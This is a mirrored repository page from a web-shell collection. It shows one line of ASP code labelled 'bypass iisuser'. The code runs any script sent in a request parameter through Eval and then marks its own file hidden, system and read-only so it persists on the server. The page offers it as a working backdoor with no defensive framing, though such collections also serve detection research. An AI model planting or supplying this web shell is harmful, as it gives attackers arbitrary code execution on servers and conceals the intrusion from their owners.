mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
c070f0793f
bypass iisuser
1 line
No EOL
193 B
Text
1 line
No EOL
193 B
Text
<%Eval(Request(chr(112))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if f.attributes <> 39 then:f.attributes = 39:end if%> |